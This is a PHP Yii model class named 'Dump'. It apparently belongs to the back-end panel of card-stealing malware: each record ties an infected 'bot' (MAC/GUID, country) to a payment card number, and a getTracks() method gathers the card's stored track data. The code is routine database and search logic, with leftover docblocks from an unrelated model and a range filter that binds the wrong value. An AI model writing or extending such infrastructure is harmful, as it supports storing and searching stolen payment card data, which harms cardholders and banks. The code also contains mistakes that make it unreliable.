<?php
/**
 * This is the model class for table "{{precious_metal_fixings}}".
 *
 * The followings are the available columns in table '{{precious_metal_fixings}}':
 * @property integer $id
 * @property integer $bot_id
 * @property integer $card_id
 * @property string $created
 *
 * The followings are the available model relations:
 * @property Bot $bot_id
 * @property Card $card_id
 */
class Dump extends CActiveRecord
{
	/**
	 * @return string the associated database table name
	 */
	public function tableName()
	{
		return 'dumps';
	}
 
	/**
	 * @return array validation rules for model attributes.
	 */
	public function rules()
	{
		return array(
			array('bot_id, card_id, created', 'required'),
			array('bot_id, card_id', 'numerical', 'integerOnly'=>true),
			// The following rule is used by search().
			array('id, bot_id, card_id, created', 'safe', 'on'=>'search'),
		);
	}
 
	/**
	 * @return array relational rules.
	 */
	public function relations()
	{
		return array(
			'bot' => array(self::BELONGS_TO, 'Bot', 'bot_id'),
			'card' => array(self::BELONGS_TO, 'Card', 'card_id')
		);
	}
 
	/**
	 * @return array customized attribute labels (name=>label)
	 */
	public function attributeLabels()
	{
		return array(
			'id' => Yii::t('models','ID'),
			'created' => Yii::t('models','Submission Date')
		);
	}
 
	/**
	 * @return CActiveDataProvider the data provider that can return the models
	 * based on the search/filter conditions.
	 * @param array $columns columns definition used in CGridView
	 */
	public function search(array $columns)
	{	
		$criteria=new CDbCriteria;
		
		$criteria->together = true;
		$criteria->with = array('bot','card','bot.country');
		
		
		foreach($this::columns() as $i=>$c){
			$c["name"] = str_replace("bot.country.name","country.name",$c["name"]);
			if(strpos($c["name"],".")===false)
				$c["name"]="t.".$c["name"];
			if(isset($_GET["sSearch_$i"])&&strlen($_GET["sSearch_$i"])>0){
				switch($c["filter"]){
					case "text":
						$criteria->compare($c["name"],$_GET["sSearch_$i"],true,'AND');
					break;
					case "number-range":
						$num = explode("~",$_GET["sSearch_$i"]);
						if(isset($num[0])&&is_numeric($num[0]))
							$criteria->addCondition($c["name"].">=:min",array("min"=>$num[0]),"AND");
						if(isset($num[1])&&is_numeric($num[1]))
							$criteria->addCondition($c["name"]."<=:max",array("max"=>$num[0]),"AND");
					break;
					case "date-range":
						$num = explode("~",$_GET["sSearch_$i"]);
						if(isset($num[0])&&strtotime($num[0])!==false)
							$criteria->compare($c["name"],">=".date('Y-m-d H:i:s', strtotime($num[0])),"AND");
						if(isset($num[1])&&strtotime($num[1])!==false)
							$criteria->compare($c["name"],"<=".date('Y-m-d H:i:s', strtotime($num[1])),"AND");
					break;
				}
			}
		}
 
		$criteria->compare('t.id',$this->id);
		$criteria->compare('bot.user_id',Yii::app()->user->getId());
		$criteria->compare('t.archived',0);
 
		return new CActiveDataProvider($this, array(
			'criteria'=>$criteria,
			'sort'=>new EDTSort(__CLASS__, $columns),
			'pagination'=>new EDTPagination,
		));
	}
 
	/**
	 * Returns the static model of the specified AR class.
	 * Please note that you should have this exact method in all your CActiveRecord descendants!
	 * @param string $className active record class name.
	 * @return PreciousMetalFixing the static model class
	 */
	public static function model($className=__CLASS__)
	{
		return parent::model($className);
	}
 
	public static function columns()
	{
		return array(
			array(
				'name'=>'',
				'header'=>'<input type="checkbox" id="cid_all" />',
				'type'=>'raw',
				'value'=>'CHtml::checkBox("cid[]",null,array("value"=>$data->id,"id"=>"cid_".$data->id,"class"=>"cid_val"))',
				'footer'=>'',
				'sortable'=>false
			),
            array(
                'name'=>'card.number',
				'type'=>'text',
				'footer'=>'Search by card nr.',
				'filter'=>'text'
            ),
            array(
                'name'=>'created',
				'type'=>'datetime',
				'footer'=>'',
				'filter'=>'date-range'
            ),
            array(
                'name'=>'bot.mac',
				'type'=>'raw',
				'footer'=>'Search by GUID',
				'value'=>'($data->bot->archived==1?"<span class=\\"glyphicon glyphicon-trash\\" title=\\"Removed\\"></span> ":"").$data->bot->mac',
				'filter'=>'text'
            ),
            array(
                'name'=>'bot.country.name',
                'type'=>'raw',
                'value'=>'CHtml::image("/images/flags/".($data->bot->country->code).".png","")." ".$data->bot->country->name',
				'footer'=>'Search by country',
				'filter'=>'text'
            ),
		);
	}

	public function getTracks(){
		$tracks = Yii::app()->db->createCommand()
		->select('*')
		->from('tracks')
		->where('dump_id=:id', array(':id'=>$this->id))
		->queryAll();
		$f_tracks=array();
		foreach($tracks as $track){
			if(!array_key_exists($track["type"], $f_tracks)||strlen($f_tracks[$track["type"]])<strlen($track["text"])){
				$f_tracks[$track["type"]] = $track["text"];
			}
		}
		return $f_tracks;
	}
}
